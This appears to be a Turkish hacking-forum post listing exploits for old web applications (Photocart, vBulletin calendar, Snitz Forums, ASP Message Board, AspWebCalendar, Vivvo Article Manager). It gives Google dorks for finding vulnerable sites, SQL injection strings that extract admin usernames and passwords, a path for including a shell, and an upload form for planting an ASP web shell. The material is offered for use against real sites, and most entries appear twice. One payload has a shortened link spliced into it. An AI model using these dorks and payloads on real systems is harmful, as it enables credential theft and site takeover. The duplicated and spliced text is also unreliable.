"Photocart" Acygy (Güncel): basit bir resim galerisi hack'leme yöntemi 
Aratacagymyz KoD(google.com): "allinurl: photocart"
Ekleyecegimiz KoD: /photocart/adminprint.php?admin_folder=shell
====================================================================
Vbuletin Calander Açy?y (Html Açyk ise): html acyksa vb'de cak
Calander 'de bir açyk var açyk olurmu bilmem ama
Dedicated Server Hosting | VPS | Domains | Webhosting | Private Racks by LeaseWeb /calendar.php?do=add&type=single&c=1
Burada html kodlary açyk ise istediginizi yazabilirsiniz.
=============================================================
Snitz Forums 2000 v3.1 SR4 (pop_profile.asp) SQL Injection Vulnerability: milw0rm buq
POC: pop_profile.asp?mode=display&id=[SQL-INJ]
Username:
pop_profile.asp?mode=display&id=1
Pass:
pop_profile.asp?mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS
=======================================================================================
ASP Message Board 2.2.1c Remote SQL Injection Vulnerability: milw0rm buq
* Dork : inurl:"printer.asp?forum="
*
* Version : 2.2.1c
*
* Bug : ASP Message Board - printer.asp - Remote Sql Injection Exploit
*
* Exploit : Admin User / Password : [url]https://tik.lat/maqAJ or 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,Admin),'NUL L'))%2b'/'%2bconvert(varchar,isnull(convert(varcha r,Password),'NULL'))%2b'/'%2bconvert(varchar,isnul l(convert(varchar,Username),'NULL')) from AMB_REGISTEREDUSERS))
================================================================================
AspWebCalendar 2008 Remote File Upload Vulnerability: milw0rm buq
# Dork :calendar.asp?eventdetail
http://[site.com]/path/calendar_admin.asp?action=uploadfile ==>>> upload your Asp shell
http://[site.com]/path/calendar/eventimages/yourshell.asp ==>>> your address
upload form
<FORM ENCTYPE='multipart/form-data' METHOD='post' ACTION='http://HOST/PATH//calendar_admin.asp?action=uploadfileprocess&form=&element='><FONT <FONT COLOR='blue' >http://example.com/path/calendar/eventimages/</FONT></FONT><BR><INPUT TYPE=FILE SIZE=56 NAME='FILE1'><BR><BR><INPUT TYPE='submit' VALUE='pwned'></FORM></P>
===========================================================================
Vivvo Article Manager : <= 3.2 (id) Remote SQL Injection Vulnerability
#App Name: phpWordPress (Vivvo Article Manager)
#App Author: vivvo.net
#App Version: <=3.2
#Vulnerable Code in pdf_version.php :
#line 19: $aid=secure_sql($_GET['id']);
#line 20: $query="SELECT * from tblArticles where id=$aid";
#secure_sql function doesn't block all sql injection attacks.
#You will need a pdf reader.
#SQL Injection String:
#http://[target]/[path]/pdf_version.php?id=-1%20UNION%20SELECT%201,2,3,password,5,6,username,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20FROM%20tblUsers%20where%20userid=[target_user_id]
#Admin Panel:http://[target]/[path]/admin
#For google searching:Vivvo Article Manager:diablo
Aratacagymyz KoD(google.com): "allinurl: photocart"
Ekleyecegimiz KoD: /photocart/adminprint.php?admin_folder=shell
====================================================================
Vbuletin Calander Açy?y (Html Açyk ise): html acyksa vb'de cak
Calander 'de bir açyk var açyk olurmu bilmem ama
Dedicated Server Hosting | VPS | Domains | Webhosting | Private Racks by LeaseWeb /calendar.php?do=add&type=single&c=1
Burada html kodlary açyk ise istediginizi yazabilirsiniz.
=============================================================
Snitz Forums 2000 v3.1 SR4 (pop_profile.asp) SQL Injection Vulnerability: milw0rm buq
POC: pop_profile.asp?mode=display&id=[SQL-INJ]
Username:
pop_profile.asp?mode=display&id=1
Pass:
pop_profile.asp?mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS
=======================================================================================
ASP Message Board 2.2.1c Remote SQL Injection Vulnerability: milw0rm buq
* Dork : inurl:"printer.asp?forum="
*
* Version : 2.2.1c
*
* Bug : ASP Message Board - printer.asp - Remote Sql Injection Exploit
*
* Exploit : Admin User / Password : [url]https://tik.lat/maqAJ or 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,Admin),'NUL L'))%2b'/'%2bconvert(varchar,isnull(convert(varcha r,Password),'NULL'))%2b'/'%2bconvert(varchar,isnul l(convert(varchar,Username),'NULL')) from AMB_REGISTEREDUSERS))
================================================================================
AspWebCalendar 2008 Remote File Upload Vulnerability: milw0rm buq
# Dork :calendar.asp?eventdetail
http://[site.com]/path/calendar_admin.asp?action=uploadfile ==>>> upload your Asp shell
http://[site.com]/path/calendar/eventimages/yourshell.asp ==>>> your address
upload form
<FORM ENCTYPE='multipart/form-data' METHOD='post' ACTION='http://HOST/PATH//calendar_admin.asp?action=uploadfileprocess&form=&element='><FONT <FONT COLOR='blue' >http://example.com/path/calendar/eventimages/</FONT></FONT><BR><INPUT TYPE=FILE SIZE=56 NAME='FILE1'><BR><BR><INPUT TYPE='submit' VALUE='pwned'></FORM></P>
===========================================================================
Vivvo Article Manager : <= 3.2 (id) Remote SQL Injection Vulnerability
#App Name: phpWordPress (Vivvo Article Manager)
#App Author: vivvo.net
#App Version: <=3.2
#Vulnerable Code in pdf_version.php :
#line 19: $aid=secure_sql($_GET['id']);
#line 20: $query="SELECT * from tblArticles where id=$aid";
#secure_sql function doesn't block all sql injection attacks.
#You will need a pdf reader.
#SQL Injection String:
#http://[target]/[path]/pdf_version.php?id=-1%20UNION%20SELECT%201,2,3,password,5,6,username,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20FROM%20tblUsers%20where%20userid=[target_user_id]
#Admin Panel:http://[target]/[path]/admin
#For google searching:Vivvo Article Manager:diablo
